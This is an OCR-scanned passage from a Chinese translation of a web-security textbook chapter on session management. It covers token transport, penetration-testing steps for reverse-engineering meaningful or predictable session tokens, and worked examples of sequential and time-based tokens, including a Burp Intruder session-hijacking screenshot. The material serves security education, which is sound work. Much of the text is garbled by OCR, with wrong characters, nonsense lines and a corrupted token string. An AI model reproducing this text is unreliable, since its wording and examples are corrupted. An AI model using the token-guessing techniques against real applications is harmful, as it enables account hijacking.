反 钓 鱼 机 制 的 作用 在 于 : 它 同 用户 确认 ， 他 们 使 用 的 是 真实 而 
非 “ 元 隆 ” 的 应 用 程序 ， 因 为 只 有 真正 的 应 用 程序 才能 显示 正确 的 图 片 。 
<r ee 
攻击 吗 ? 





























L CAPTCHA 项 目 是 Completely Automated Public Turing Test to Tell 


Computers and Humans Apart 〈 全 上 自动 区 分 计算 机 和 人 类 的 网 灵 测 试 ) 
的 简称 ， 已 由 卡 内 基 梅 隆 大 学 注册 商标 。CAPTCHA 是 区 分 计算 机 和 人 
类 的 一 种 程序 算法 ， 这 种 程序 必须 能 生成 并 评价 人 类 能 很 容易 通过 但 计 
LALA Mi. SERA ET, ALARA SA 
CAPTCHA 必 须 能 生成 一 个 它 目 己 不 能 通过 的 测试 。 译 者 注 

B 社会 工程 (Social Engineering) 是 一 种 利用 人 的 弱点 〈 如 人 的 本 能 
应 、 好 奇 心 、 信 任 、 贪 禁 等 进行 诸如 欺骗 、 伤 害 等 危害 手段 ”， 获 取 自 
吴 利 益 的 攻击 方法 。 译 者 注 














在 绝 大 多 数 Web 应 用 程序 中 ， 会 话 管理 机 制 是 一 个 基本 的 安全 组 
件 。 它 帮助 应 用 程序 从 大 量 不 同 的 请 求 中 确认 特定 的 用 户 ， 并 处 理 它 收 
集 的 关于 用 户 与 应 用 程序 交互 状态 的 数据 。 会 话 管理 在 应 用 程序 执行 登 
录 功 能 时 显得 特别 重要 ， 因 为 它 可 在 用 户 通 过 请 求 提交 他 们 的 证 书后 ， 
持续 癌 应 用 程序 保证 任何 特定 用 户 身 份 的 真实 性 。 

由 于 会 话 管理 机 制 所 发 挥 的 关键 作用 ， 它 们 成 为 针对 应 用 程序 的 恶 
意 攻击 的 主要 目标 。 如 果 攻 击 者 能 够 破坏 应 用 程序 的 会 话 管理 ， 他 就 能 
轻易 避 开 其 实施 的 验证 机 制 ， 不 需要 用 户 证 书 即 可 伪 闭 成 其 他 应 用 程序 
用 户 。 如 果 攻 击 者 以 这 种 方式 攻破 一 个 管理 用 户 ， 那 么 他 就 能 够 控制 整 
个 应 用 程序 。 

和 验证 机 制 一 样 ， 通 常会 话 管理 功能 中 也 存在 着 大 量 缺 陷 。 在 最 容 
易 遭 受 攻击 的 情况 下 ， 攻 击 者 只 需 递增 应 用 程序 同 他 们 发 布 的 令 牌 值 ， 
就 可 以 转换 到 男 一 名 用 户 的 账户 。 在 这 种 情况 下 ， 任 何人 都 可 以 访问 应 
用 程序 的 全 部 功能 。 男 一 方面 ， 如 果 应 用 程序 受到 严密 保护 ， 攻 击 者 必 
须 付出 巨大 的 努力 ， 破 解 儿 层 模 糊 处 理 并 实施 复杂 的 自动 攻击 ， 才 能 发 
现 应 用 程序 中 存在 的 细小 漏洞 。 

本 章 将 分 析 我 们 在 现实 世界 的 Web 应 用 程序 中 发 现 的 各 种 漏洞 ， 详 
细 说 明 发 现 和 利用 这 些 漏洞 所 希 执 行 的 实际 步骤 。 最 后 还 将 描述 应 用 程 
序 为 防止 这 些 攻击 所 应 采取 的 防御 措施 。 




















w 错误 观点 “我 们 使 用 智能 卡 进行 验证 ， 没 有 智能 卡 攻 击 者 
不 可 能 攻破 用 户 会 话 。” 
无 论 应 用 程序 的 验证 机 制 多 么 安全 稳定 ， 只 有 通过 会 话 用 


户 随后 提出 的 请 求 才 能 与 验证 机 制 建立 联系 。 如 果 应 用 程序 的 
会 话 管理 存在 缺陷 ， 攻 击 者 仍然 能 够 避 开 可 靠 的 验证 机 制 ， 危 
及 用 户 的 安全 。 


7.1 状态 要 求 





从 本 质 上 讲 ，HTTP 协 议 没有 状态 。 它 基于 一 种 简单 的 请 求 一 响应 
模型 ， 其 中 每 对 消息 代表 一 个 独立 的 事务 。 协 议 本 身 并 无 将 某 位 用 户 提 
出 的 各 种 请 求 联系 起 来 的 机 制 ， 并 将 它们 与 Web 服 务 器 收 到 的 所 有 其 他 
请 求 区 分 开 来 。 在 Web 发 展 的 早期 阶段 ， 并 没有 必要 建立 这 种 机 制 ， 因 
为 Web 站 点 公布 的 是 任何 人 都 可 以 查阅 的 静态 HTML 页 面 。 但 如 今 ， 情 
况 已 经 发 生 了 巨大 变化 。 

绝 大 多 数 的 Webs 站 点 "实际 为 Web 应 用 程序 。 它 们 允许 用 户 注册 与 
登录 ， 帮 助 用 户 购买 及 销售 产品 。 它 们 能 够 在 用 户 下 次 访问 时 记 住 他 的 
喜好 。 它 们 可 根据 用 户 的 单 击 和 输入 ， 通 过 动态 建立 的 内 容 提供 丰富 、 
多 媒体 形式 的 使 用 体验 。 为 执行 这 些 功能 ， 应 用 程序 就 需要 使 用 会 话 。 

支持 登录 是 会 话 在 应 用 程序 中 最 主要 的 用 途 。 输 入 用 户 名 和 密码 
后 ， 可 以 用 输入 的 证 书 所 属 的 用 户 身份 使 用 应 用 程序 ， 直 到 退出 会 话 或 
由 于 会 话 处 于 非 活动 状态 而 终止 。 用 户 不 希望 在 每 个 应 用 程序 页 面 重复 
输入 密码 。 因 此 ， 一 旦 用 户 通过 验证 ， 应 用 程序 就 会 为 他 建立 一 个 会 
话 ， 把 所 有 属于 这 个 会 话 的 请 求 当做 该 用 户 提出 的 请 求 处 理 。 

不 具备 登录 功能 的 应 用 程序 通常 也 需要 使 用 会 话 。 许 多 出 售 商品 的 
站 点 并 不 要 求 顾客 建立 账户 。 但 是 ， 它 们 允许 用 户 浏览 目录 、 往 购物 复 
中 添加 商品 、 提 供 交 货 信息 并 进行 支付 。 在 这 种 情形 下 ， 就 没有 必要 验 
证 用 户 的 身份 : 应 用 程序 并 不 知道 或 关心 绝 大 多 数 用 户 的 身份 。 但 是 ， 
为 与 他 们 渤 行 交易 ， 应 用 程序 需要 知道 它 收 到 的 哪些 请 求 来 自 同一 名 

PP 
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话 令 牌 或 标识 符 。 用 户 在 随后 回应 用 程序 提出 的 每 一 个 请 求 中 提交 这 个 
令 牌 ， 帮 助 应 用 程序 在 当前 请 求 与 前 面 提 出 的 请 求 之 间 建 立 关 联 。 

在 大 多 数 情 况 下 ， 应 用 程序 使 用 HTTP cookie 作 为 在 服务 器 与 客户 
端 则 传送 这 些 会 话 令 牌 的 传输 机 制 。 服 务 器 对 新 客户 端的 第 一 个 响应 中 
包含 以 下 HTTP 消 息 头 : 


Set-Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55 
客户 站 随后 提出 的 请 求 中 包含 如 下 消 朋 头 : 


Cookie: ASP.NET_SessionId=mza2ji454s04cwhgwb2ttj55 


























这 种 标准 的 会 话 管理 机 制 非常 容易 受到 各 种 类 型 的 攻击 。 当 攻击 会 
话机 制 时 ， 攻 击 者 的 主要 目标 是 以 某 种 方式 劫持 一 名 合法 用 户 的 会 话 ， 
由 此 伪装 成 这 名 用 户 。 如 果 该 用 户 已 经 通过 应 用 程序 的 验证 ， 攻 击 者 就 
可 以 访问 属于 这 名 用 户 的 私有 数据 ， 或 者 以 他 的 身份 执行 未 授权 操作 。 
m A a 
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和 前 面 示例 中 运行 ASP.NET 的 Microsoft IIS 服 务 器 一 样 ， 许 多 商业 
Web 服 务 器 和 Web 应 用 程序 平台 执行 它们 目 己 的 基于 HTTP cookie 的 非 定 
制 会 话 管 理解 决 方案 。Web 应 用 程序 开发 者 可 使 用 它们 提供 的 API 将 会 
话 依 赖 功能 与 这 种 解决 方案 整合 起 来 。 

事实 证 明 ， 一 些 非 定制 会 话 管理 解决 方案 易于 受到 各 种 攻击 ， 导 致 
用 户 的 会 话 被 攻破 〈 这 一 问题 将 在 本 章 后 面 讨 论 ) 。 此 外 ， 一 些 开 发 者 
发 现 ， 他 们 需要 比 内 置 解雇 方案 所 提供 的 控制 更 加 全 面 的 会 话 行为 控 
制 ， 或 者 希望 避免 基于 cookie 的 解决 方案 中 存在 的 一 些 回 有 漏洞 。 鉴 于 
这 些 原因 ， 安 全 性 至 关 重 要 的 应 用 程序 (如 电子 银行 ) 通常 使 用 定制 或 
并 非 基 于 cookie 的 会 话 管理 机 制 |。 

会 话 管理 机 制 中 存在 的 漏洞 主要 分 为 两 类 : 

口 会 话 令 牌 生成 过 程 中 的 薄弱 环节 ; 

口 在 整个 生命 周期 过 程 中 处 理会 话 令 牌 的 薄弱 环节 。 

我 们 将 分 别 分 析 这 些 弱 点 ， 描 述 在 现实 世界 的 会 话 管理 机 制 中 常见 
的 各 种 漏洞 ， 以 及 发 现 和 利用 这 些 漏洞 的 实用 技巧 。 最 后 将 描述 应 用 程 
序 为 防止 这 些 攻 击 所 应 采取 的 防御 措施 。 

















渗透 测试 步 又 


许多 应 用 程序 使 用 标准 的 cookie 机 制 传输 会 话 令 牌 ， 这 样 可 直 
接 确 定 哪 些 数 据 包含 令 牌 。 然 而 ， 在 其 他 情况 下 ， 可 能 需要 进行 一 
番 探 测 才 能 找到 令 牌 。 

C1) 应 用 程序 常常 使 用 几 个 不 同 的 数据 共同 表示 一 个 令 牌 ， 
包括 cookie、URL 参 数 和 隐藏 表单 字段 。 其 中 一 些 数据 可 用 于 在 不 
同 的 后 端 组 件 中 维护 会 话 状 态 。 如 果 没 有 得 到 确认 ， 不 要 想当然 地 
BI 0 或 者 只 使 用 一 个 数据 追踪 会 
TH o 

(2) 有 时 ， 一 些 数据 似乎 是 应 用 程序 的 会 话 令 牌 ， 其 实 并 非 
如 此 。 有 具体 来 说 ， 由 Web 服 务 器 或 应 用 程序 平台 生成 的 标准 会 话 
cookie 可 能 存在 ， 但 实际 并 不 被 应 用 程序 使 用 。 

(3) 用 户 通过 验证 后 ， 观 穴 浏 览 器 收 到 哪些 新 数据 项 。 应 用 
程序 通常 会 在 用 户 通 过 验证 后 建立 新 的 会 话 令 牌 。 

(4) 为 确定 应 用 程序 到 底 使 用 哪些 数据 项 作为 令 牌 ， 找 到 一 
个 确信 依赖 会 话 的 页 面 〈 如 某 一 名 用 户 的 “用 户 资料 页面) ， 并 同 
它 提 出 几 个 请 求 ， 系 统 性 地 删除 疑似 被 用 作 令 牌 的 数据 。 如 果 删 除 
某 个 数据 后 ， 应 用 程序 不 再 返回 会 话 依赖 页 面 ， 即 可 确定 该 数据 可 
能 为 会 话 令 牌 。Burp Repeater 是 执行 这 类 测试 的 有 效 工 具 。 
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并 非 每 一 种 Web 应 用 程序 都 使 用 会 话 ， 一 些 具 备 验 证 机 制 、 功 能 
杂 的 安全 性 至 关 重 要 的 应 用 程序 选择 使 用 其 他 技术 管理 状态 。 和 常见 的 会 
话 蔡 代 方案 有 两 种 。 

口 HTTP 验 证 。 使 用 各 种 基于 HTTP 验 证 技术 (基本 、 摘 要 、NTLM 
验证 等 ) 的 应 用 程序 有 时 避免 使 用 会 话 。 在 HITP 验 证 中 ， 客 户 端 组 件 
使 用 HTTP 消 息 头 通过 浏览 器 直接 与 验证 机 制 交 互 ， 而 不 是 通过 包含 在 
任何 单独 页 面 中 的 针对 特定 应 用 程序 的 代码 与 验证 机 制 交 互 。 一 旦 用 户 
在 浏览 器 对 话 框 中 输入 他 的 证 书 ， 浏 览 器 将 会 在 随后 向 同一 服务 器 提出 
的 每 个 请 求 中 重复 提交 这 些 证 书 (或 重复 执行 任何 必要 的 握手 ) 。 这 种 
做 法 等 同 于 应 用 程序 使 用 基于 HTML 表 单 的 验证 ， 并 在 每 个 应 用 程序 页 
面 插入 一 个 登录 表单 ， 要 求 用 户 通过 他 们 执行 的 每 一 项 操作 重复 验证 自 
已 的 身份 。 因 此 ， 如 果 使 用 基于 HTTP 的 验证 ， 应 用 程序 可 以 不 必 使 用 
会 话 ， 而 通过 多 个 请 求 重 复 确定 用 户 身 份 。 然 而 ， 基 于 因特网 的 应 用 程 
序 很 少 使 用 HTTP 验 证 。 而 且 ， 由 于 会 话机 制 发 展 完 善 ， 能 够 提供 其 他 
用 途 非 党 广泛 的 功能 ， 实 际 上 ， 几 乎 所 有 的 Web 应 用 程序 都 采用 这 种 机 


制 |。 

口 无 会 话 状 态 机 制 。 一 些 应 用 程序 并 不 发 布 会 话 令 牌 管理 用 户 与 应 
用 程序 的 交互 状态 ， 而 是 传送 所 有 必要 数据 (一 般 保存 在 cookie 或 隐藏 
表单 字段 中 ) ， 由 客户 端 管 理 状态 。 实 际 上 ， 这 种 机 制 以 类 似 于 
ASP.NET ViewState 的 方式 使 用 无 会 话 状态 。 为 保证 这 种 机 制 的 安全 ， 
必须 对 通过 客户 端 传 送 的 数据 加 以 适当 保护 。 这 通常 要 求 建立 一 个 包含 
所 有 状态 信息 的 二 进 制 巨 对 象 ， 并 使 用 一 种 公认 的 算法 对 这 些 数据 进行 
加 密 或 签名 。 还 必须 在 数据 中 包含 足够 的 上 下 文 ， 以 防止 攻击 者 将 在 应 
用 程序 某 个 位 置 收集 到 的 状态 对 象 提交 到 男 一 个 位 置 ， 造 成 菜 种 意外 行 
为 。 应 用 程序 还 必须 在 对 象 的 数据 中 包含 一 个 终止 时 间 ， 执 行 与 会 话 超 
Da ets nner rege terse! 
安全 机 制 | 。 









































渗透 测试 步 又 


(1) 如 果 应 用 程序 使 用 HTTP 验 证 ， 它 可 能 并 不 执行 会 话 管理 
机 制 。 使 用 前 面 描述 的 方法 分 析 任 何 可 能 是 令 牌 的 数据 的 作用 。 
(2) 如 果 应 用 程序 使 用 无 会 话 状 态 机 制 ， 通 过 客户 端 传送 所 
有 必要 数据 进行 状态 维护 ， 有 时 我 们 可 能 很 难 检测 出 这 种 机 制 ， 但 
如 果 发 现下 列 迹 象 ， 即 可 确定 应 用 程序 使 用 这 种 机 制 。 
o 问 客 户 端 发 布 的 可 能 令 牌 的 数据 相当 长 〈 如 100 B 或 超过 100 


口 应 用 程序 对 每 个 请 求 做 出 响应 ， 发 布 一 个 新 的 类 似 令 牌 的 数 


口 数据 似乎 被 加 密 (因此 无 法 辨别 其 结构 或 包含 签名 (由 有 
意义 的 结构 和 几 个 字 节 的 无 意义 二 进 制 数据 组 成 ) 。 

口 应 用 程序 拒绝 通过 多 个 请 求 提 交 相 同 数据 的 做 法 。 

(3) 如 果 相 关 证 据 明 确 表 明 应 用 程序 并 未 使 用 会 话 令 牌 管理 
状态 ， 那 么 本 半 摘 述 的 任何 攻击 都 不 可 能 达到 其 目的 。 因 此 ， 最 好 
帮手 去 寻找 其 他 严重 的 漏洞 ， 如 访问 控制 不 完善 或 代码 注入 。 


B) 











由 于 生成 令 牌 的 过 程 不 安全 ， 攻 击 者 能 够 确定 发 布 给 其 他 用 户 的 令 
牌 ， 致 使 会 话 管理 机 制 易 于 受到 攻击 。 


ay 


=> 注解 许多 时 候 ， 应 用 程序 的 安全 取 雇 于 它 所 生成 的 令 牌 

的 不 可 预测 性 ， 以 下 是 一 些 示 例 : 

o 发 送 到 用 户 注册 的 电子 邮件 地 址 的 密码 恢复 令 牌 ; 

口 隐藏 表单 字段 中 用 于 防止 跨 站 点 请 求 伪 造 攻击 (请 参阅 第 13 

章 ) 的 令 牌 ; 

口 用 于 一 次 性 访问 受 保护 的 资源 的 令 牌 ; 

口 “ 记 住 我 ?功能 使 用 的 永久 令 牌 ; 

口 未 使 用 验证 的 购物 应 用 程序 的 消费 者 用 于 检索 现 有 订单 的 当 

前 状态 的 令 牌 。 

在 本 章 中 ， 我 们 主要 讨论 适用 于 上 述 所 有 情形 的 与 令 牌 生 

成 有 关 的 缺陷 。 实 际 上 ， 由 于 当前 的 许多 应 用 程序 都 采用 成 熟 
的 平台 机 制 来 生成 会 话 令 牌 ， 因 此 ， 往 往 会 在 这 些 功能 区 域 发 
现 有 关 令 牌 生成 的 可 利用 缺陷 。 
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一 些 会 话 令 牌 通过 用 户 的 用 户 名 或 电子 邮件 地 址 转换 而 来 ， 或 者 使 
用 与 其 相关 的 其 他 信息 创建 。 这 些 信息 可 以 某 种 方式 进行 编码 或 模糊 处 
理 ， 也 可 与 其 他 数据 结合 在 一 起 。 

例如 ， 初 看 起 来 ， 下 面 的 令 牌 由 一 长 串 随 机 字符 组 成 : 

5736572306461663b61707030d616460696e3b646174653d30212£31322F3131 

但 是 ， 仔 细 分 析 后 发 现 ， 其 中 仪 包含 十 六 进 制 字 符 。 猜 想 这 个 字符 
eT 8 MSE A A IASC, BATTERS 
AAS, BRBVE SK ba ze: 





user=daf; app=admin; date=10/09/11 


攻击 者 可 以 利用 这 个 会 话 令 牌 的 含义 猜测 其 他 应 用 程序 用 户 的 当前 
会 话 。 使 用 一 组 枚 举 出 的 用 户 名 或 常见 用 户 名 ， 就 能 够 迅速 生成 大 量 可 
能 有 效 的 令 牌 ， 并 进行 测试 以 确定 它们 是 否 有 效 。 

包含 有 含义 数据 的 令 牌 通常 表现 出 某 种 结构 。 也 就 是 说 ， 它 们 由 几 
种 成 分 组 成 ， 通 党 以 分 隔 符 隔 开 ， 攻 击 者 可 分 别提 取 并 分 析 这 些 成 分 ， 
以 了 解 它 们 的 功能 和 生成 方法 。 结 构 化 令 牌 的 组 成 成 分 包括 以 下 几 项 。 
口 账 户 用 户 名 。 
口 应 用 程序 用 来 区 分 账户 的 数字 标识 符 。 
口 用 户 姓名 中 的 名 / 姓 。 
口 用 户 的 电子 邮件 地 址 。 
口 用 户 在 应 用 程序 中 所 属 的 组 或 扮演 的 角色 。 
口 日 期 /时 间 惟 。 
口 一 个 递增 或 可 预测 的 数字 。 
口 客户 端的 IP 地 址 。 
为 特意 对 其 内 容 进行 模糊 处 理 ， 或 者 只 是 为 了 确保 二 进 制 数 据 能 通 
过 HTTP 安 全 传输 ， 应 用 程序 会 对 结构 化 令 牌 中 的 每 个 不 同 成 分 或 整个 
令 和 脾 以 不 同方 式 进行 编码 。 常 用 的 编码 方案 包括 XOR、Base64 和 使 用 
ASCII 字 符 的 十 六 进 制 表示 法 “〈 请 参阅 第 3 章 了 解 相 关内 容 ) 。 为 将 其 恢 
和 
明码 方法 。 

















:二 


> 注解 ” 当 处 理 包 含 结构 化 令 牌 的 请 求 时 ， 应 用 程序 可 能 不 
会 处 理 令 牌 中 的 每 一 个 成 分 或 每 个 成 分 中 的 所 有 数据 。 在 前 面 的 示 
例 中 ， 应 用 程序 可 能 会 对 令 牌 进行 Base64 和 解码， 然后 只 处 理 其 中 

HJH” Cuser) 和 “日 期 * (date) 成 分 。 如 果 令 牌 中 包含 一 个 二 进 
制 巨 对 象 ， 那 么 这 些 数据 中 的 大 部 分 为 填充 数据 ， 只 有 一 小 部 分 数 
据 与 服务 器 在 令 牌 上 执行 的 确认 有 关 。 减 少 令 牌 中 确实 必需 的 成 分 
的 数量 通常 可 显著 降低 令 牌 的 复杂 程度 。 





渗透 测试 步 又 


(1) 从 应 用 程序 中 获取 一 个 令 有 牌 ， 对 其 进行 系统 化 的 修改 ， 
以 确定 整个 令 牌 是 否 有 效 ， 或 者 令 牌 的 某 些 成 分 是 否 被 忽略 。 洽 试 
以 一 次 一 个 字 节 (或 者 一 次 一 个 位 〉 的 方式 更 改 令 牌 的 值 ， 然 后 重 
新 问 应 用 程序 提交 修改 后 的 令 牌 ， 看 应 用 程序 是 否 仍 然 接 受 这 个 令 
牌 。 如 果 发 现 令 牌 中 的 某 些 部 分 实际 上 并 无 作用 ， 可 以 将 它们 排除 
在 深入 分 析 之 外 ， 以 减轻 工作 负担 。 可 以 使 用 Burp Intruder 中 
的 “char frobber” 有 效 载荷 类 型 修改 令 牌 的 值 ， 每 次 修改 一 个 字符 ， 
以 帮助 完成 此 任务 。 

(2) 在 不 同时 间 以 不 同 的 用 户 登 录 ， 记 录 服 务 器 发 布 的 令 
牌 。 如 果 应 用 程序 允许 自我 注册 ， 可 以 选择 上 自己 的 用 户 名 ， 用 一 系 
列 存在 细微 差别 的 相似 用 户 名 登录 ， 如 A、AA、AAA、AAAA、 
AAAB、AAAC、AABA 等 。 如 果 其 他 与 某 一 名 用 户 有 关 的 数据 
(如 电子 邮件 地 址 〉 在 登录 阶段 提交 或 保存 在 用 户 资料 中 ， 对 其 进 
行 与 前 面 类 似 的 系统 化 修改 ， 并 记录 登录 后 收 到 的 令 牌 。 

(3) 对 令 牌 进行 分 析 ， 查 找 任何 与 用 户 名 和 其 他 用 户 可 控制 
的 数据 有 关 的 内 容 。 

(4) 分 析 令 牌 ， 查 找 任何 明显 的 编码 或 模糊 处 理 方 案 。 如 果 
用 户 名 包含 一 组 相同 的 字符 ， 在 令 牌 中 寻找 可 能 使 用 XOR 模 糊 处 理 
的 对 应 字符 序列 ;在 令 牌 中 寻找 仅 包 含 十 六 进 制 字 符 的 字符 序列 ， 
它 表 示 应 用 程序 可 能 对 ASCII 字 符 串 进行 了 十 六 进 制 编码 处 理 ， 或 
者 披露 其 他 信息 。 寻 找 以 等 号 (=) 结尾 的 字符 序列 或 仅 包含 其 他 
有 效 Base64 字 符 的 序列 ， 如 a 一 z、A 一 Z、0 一 9、+ 和 /。 

(5) 如 果 对 会 话 令 牌 样本 进行 逆向 工程 可 获得 任何 有 意义 的 
结果 ， 看 看 是 否 拥有 足够 的 信息 可 猜测 出 应 用 程序 最 近 疝 其 他 用 户 
发 布 的 令 牌 。 找 到 一 个 依赖 会 话 的 应 用 程序 页 面 〈 即 如 果 不 使 用 有 
效 会 话 访 问 ， 就 会 返回 错误 消息 或 指向 其 他 位 置 的 重 定向 页 面 ) ， 
通过 Burp Intruder 之 类 的 工具 可 使 猜测 出 的 令 牌 癌 该 页 面 提 出 大 量 
e 
效 。 
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7.2.2 Akn 


一 些 会 话 令 牌 并 不 包含 与 某 个 特定 用 户 有 关 的 任何 有 意义 的 数据 ， 
但 由 于 它们 包含 某 种 顺序 或 模式 ， 人 允许 攻击 者 通过 几 个 令 牌 样本 即 可 推 
断 出 应 用 程序 最 近 发 布 的 其 他 有 效 令 牌 ， 因 此 具有 可 预测 性 。 即 使 推 呆 
过 程 需 要 做 出 大 量 尝 试 ， 并 且 成 功率 极 低 〈 例 如 ， 每 1000 次 尝试 得 到 一 
个 有 效 令 牌 ) ， 目 动 攻 击 工具 也 仍然 能 够 利用 这 种 缺陷 在 很 短 的 时 间 内 
确定 大 量 有 效 令 牌 。 

与 定制 应 用 程序 相 比 ， 会 话 管理 的 商业 应 用 《如 Web 服 务 器 或 Web 
应 用 程序 平台 ) 中 的 令 牌 可 预测 漏洞 更 容易 被 发 现 。 当 同一 个 定制 会 话 
管理 机 制 实施 远程 攻击 时 ， 攻 击 者 所 能 获得 的 已 发 布 令 牌 样本 的 数量 可 
能 受到 服务 器 容量 、 其 他 用 户 的 活动 、 人 带宽、 网络 延 时 等 因素 的 限制 。 
然而 ， 在 实验 室 环 境 中 ， 渗 透 测 试 员 可 以 迅速 建立 数 百 万 个 令 牌 样本 ， 
干扰 。 

在 最 简单 也 是 最 容易 受到 攻击 的 情况 下 ， 应 用 程序 使 用 一 个 简单 的 
连续 数字 作为 会 话 令 牌 。 这 时 ， 攻 击 者 只 需 获 得 两 个 或 三 个 令 牌 样本 束 
可 以 实施 攻击 ， 并 立即 截获 当前 有 效 的 所 有 令 牌 。 

图 7-1 表 示 正 在 使 用 Burp Intruder 循 环 访问 一 个 连续 会 话 令 牌 的 最 后 
两 位 数字 ， 以 碍 找 会 话 仍 处 于 活动 状态 可 被 劫持 的 令 牌 值 。 这 时 ， 服 务 
器 啊 应 的 长 度 是 发 现 有 效 会 话 的 可 靠 指 标 。 并 且 从 中 提取 的 grep 特 性 也 
可 用 于 显示 每 个 会 话 登 录用 户 的 用 户 名 。 
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results target positions | payloads options 
| request | payload status | error t meo length Logged in as comment 
8 07 200 | 1314 John Herman a 
28 15 200 1348 Administrator » 
135 22 1200 J | 门 Ha Paolna 
73 48 200 | 1312 GUnil 
1128 LLS 200 | 11357 PSCDMGILr 
1147 [92 200 1332 Keycck | 
0 302 | §46 baseline request 
1 |m 302 546 
2 01 302 546 
3 (02 202 546 z 
te quest p e 
aw param header vex 
ET uct 3 m shx HTTP/1.1 一 
Host: misec.ne 
User-Agent: Kozilla/5.0 (Vindows; U; Windovs NT €.1; en-GB; rvri.3.2.10) 
Gecko/20O100814 Firefox/3.€.10 
accept: text/html, application/xhtml+xml, application/srl;q=0.5,*/*;q=0.8 
Accept : en-gb,en:qr-0.5 
Accept-Enc ji gzip,deflate 
àccept-Cha t: 150-885S-1, utt-8:q"0.7,*:;q°5.7 
Keep-Alive: 11 
nnecri close 
Referer: heepsa://mdsec.net/auth/ 340/Default.ashx 
Cookie: Sessgionld=51062E93E9FB22 
0 matches 
finished | z 
、 > ` as ` AY 
图 7-1 会 话 令 牌 可 预测 时 得 找 有 效 会 话 的 一 次 攻击 
ae 


在 其 他 情况 下 ， 应 用 程序 令 牌 中 可 能 包含 更 加 复杂 的 序列 ， 
出 一 定 的 努力 才能 发 现 。 序 列 的 变化 形式 可 能 多 种 多 样 ， 但 是 ， 
们 的 行业 经 验 ， 可 预测 的 会 话 令 牌 通常 来 目 3 个 方面 : 


口 隐 含 序列 ; 
口 时 间 依 赖 ; 


口 生成 的 数字 随机 性 不 强 。 
我 们 将 分 别 讨论 这 3 种 情况 。 


1. 隐 含 序列 








有 了 时， 对 会 话 令 牌 的 原始 形式 进行 分 析 可 能 无 法 预测 它们 ; 





对 其 进行 适当 解码 或 解 译 就 可 以 揭示 其 中 包含 的 序列 。 


以 下 面 一 组 值 为 例 ， 


它 是 一 


个 结构 化 会 话 令 牌 的 组 成 成 分 : 


lwjVJA 
Ls3Ajg 
xpKr+A 
XlexYg 
9hyCzA 
jeFuNg 
JaZZoA 
一 眼看 来 ， 其 中 并 不 包含 任何 模式 。 然 而 ， 粗 略 检 查 后 发 现 ， 令 牌 
中 可 能 包含 Base64 编 码 的 数据 ， 除 大 小 写 混合 的 字母 和 数字 字符 外 ， 其 
中 还 有 一 个 + 字符 ， 它 也 是 一 个 有 效 的 Base64 字 符 串 。 使 用 Base64 解 码 
器 对 令 牌 解码 ， 得 到 以 下 结果 : 
--6$ 
. TAZ 
B'«@ 
“W-b 
6,1 
?an6 
%IY 
很 明显 ， 这 些 字 符 串 是 乱码 ， 并 且 其 中 包含 非 打 印字 符 。 通 常 来 
说 ， 这 表示 处 理 的 是 二 进 制 数 据 ， 而 非 ASCI 文 本 。 将 解码 后 的 数据 以 
十 六 进 制 表示 ， 得 到 : 
9708D524 
ZECDCO8E 
C692ABF8 
5E579762 
F61C82CC 
8DE16E36 
25A659A0 


其 中 仍然 没有 明显 的 模式 。 然 而 ， 如 果 用 前 一 个 数字 减 去 后 一 个 数 
字 ， 就 会 得 到 以 下 结果 : 





-> 


FF97C4EB6A 

97CAEB6A 

FF97C4EB6A 

97C4EB6A 

FF97C4EB6A 

FF97C4EB6A 
隐 含 的 模式 立即 显露 出 来 。 生 成 令 牌 的 算法 如 下 : 用 前 一 个 值 加 上 
0x97C4EB6A， 把 结果 截 短 成 一 个 32 位 的 数字 ， 并 对 这 个 二 进 制 数据 进 
行 Base64 编 码 ， 使 其 能 够 通过 基于 文本 的 HITP 协 议 传输 。 了 解 到 这 一 
点 ， 就 能 轻易 编写 出 一 段 脚 本 ， 生 成 服务 器 接 下 来 产生 的 令 脾 ， 以 及 它 
在 被 截获 的 样本 之 前 产生 的 令 牌 。 
2. 时 间 依 赖 

一 些 Web 服 务 器 和 应 用 程序 使 用 时 间作 为 令 牌 值 的 输入 ， 通 过 某 种 
算法 生成 会 话 令 牌 。 如 果 没 有 在 算法 中 合并 足够 的 烂 出 ， 攻 击 者 就 可 能 
推测 出 其 他 用 户 的 令 牌 。 虽 然 任何 特定 的 令 牌 序列 本 身 是 完全 随机 的 ， 
但 是 ， 如 果 组 合生 成 每 个 令 牌 的 时 间 人 信息， 也 许可 以 发 现 某 种 可 以 辨别 
的 模式 。 一 个 忙碌 的 应 用 程序 每 秒 会 生成 大 量 的 会 话 ， 因 此 实施 一 次 自 
定义 攻击 就 可 以 成 功 确定 其 他 用 户 的 大 量 令 有 牌 。 
测试 一 家 网 上 零售 商 的 Web 应 用 程序 时 ， 我 们 过 到 以 下 令 牌 序列 : 

3124538-1172764258718 

3124539-1172764259062 

3124540-1172764259281 

3124541-1172764259734 

3124542-1172764260046 

3124543-1172764260156 

3124544-1172764260296 

3124545-1172764260421 

3124546-1172764260812 


3124547-1172764260890 
很 明显 ， 每 个 令 牌 由 两 个 独立 的 数字 组 成 : 前 一 个 数字 的 递增 模式 
非常 简单 ， 很 容易 推测 。 后 一 个 数字 的 递增 值 每 次 都 有 所 变化 。 计 算出 
每 个 连续 令 牌 的 递增 值 ， 得 到 以 下 结 宁 : 











312 
110 
140 
125 
391 
78 
这 个 序列 并 不 包含 可 预测 的 模式 。 但 显而易见 的 是 ， 攻 击 者 可 以 通 
过 自动 攻击 确定 相关 的 数字 范围 ， 通 过 蛮 力 攻击 发 现 序 列 中 的 有 效 值 。 
不 过 ， 在 开始 攻击 前 ， 等 待 几 分 钟 后 可 截取 另 一 个 令 牌 序列 : 
3124553-1172764800468 
3124554-1172764800609 
3124555-1172764801109 
3124556-1172764801406 
3124557-1172764801703 
3124558-1172764802125 
3124559-1172764802500 
3124560-1172764802656 
3124561-1172764803125 
3124562-1172764803562 


将 这 个 令 牌 序列 与 第 一 个 序列 进行 比较 ， 立 即 得 到 两 个 明显 的 结 


口 第 一 个 数字 序列 继续 递增 ， 但 是 ， 第 一 个 数字 序列 后 面 遗 漏 了 5 
个 值 。 这 可 能 是 因为 应 用 程序 癌 其 他 用 户 发 布 了 这 5 个 值 ， 他 们 在 两 次 
测试 的 间隙 登录 了 应 用 程序 。 

口 第 二 个 数字 序列 继续 增 大 ， 其 递增 形式 与 第 一 个 序列 类 似 。 但 
是 ， 得 到 的 第 一 个 值 比 前 一 个 值 大 539 578， 大 了 许多 。 

第 二 次 观测 的 结果 立即 让 人 产生 警惕 ， 推 测 时 间 在 会 话 令 牌 生成 过 
